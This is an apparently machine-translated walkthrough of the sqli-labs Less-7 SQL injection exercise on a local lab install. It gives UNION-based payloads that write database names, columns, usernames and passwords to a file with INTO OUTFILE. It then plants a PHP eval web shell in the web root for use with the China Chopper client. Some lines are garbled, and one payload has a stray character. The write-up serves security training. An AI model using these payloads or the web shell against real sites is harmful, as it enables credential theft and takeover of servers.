##sqli-labs less -7
http://localhost/sqli-labs-master/Less-7/?id=1
First, the old way to tell is numeric or character of
With and 1 = 1 and 1 = 2 is determined and is not numeric
Next, a 'and' to determine
Analyzing Results' echo error "Normal Echo
Description is' character
But substituting '- + found
The note also missing some stuff
With speculation)
Found ')) - + normal echo
According to the topic of DUMB outfile
It is possible to export data file vulnerability
so use ')) union select 1,2,3 into outfile "xixi.txt" - +
Even echo error
But you can see the success of the
next can begin to get the database name and user information
'))union select 1,2,table_name from information_schema.tables where table_schema=‘security’ into outfile “xixi.txt”–+
'))union select 1,2,c。olumn_name from information_schema.columns where table_name=‘users’ into outfile “xixi.txt”–+
'))union select 1,2,username from security.users into outfile “xixi.txt”–+
'))union select 1,2,password from security.users into outfile “xixi.txt”–+
#######
Face the problem, it can also be used to solve the structure of a word Trojan
'))union select 1,2, ‘<?php eval($_post["reader"])?>’ into outfile “xixi.php”–+
'))union select 1,2, ‘<?php eval($_post[reader])?>’ into outfile “D:/phpStudy/PHPTutorial/WWW/sqli-labs-master/less-7/xixi.php”–+
And then connect with the Chinese kitchen knife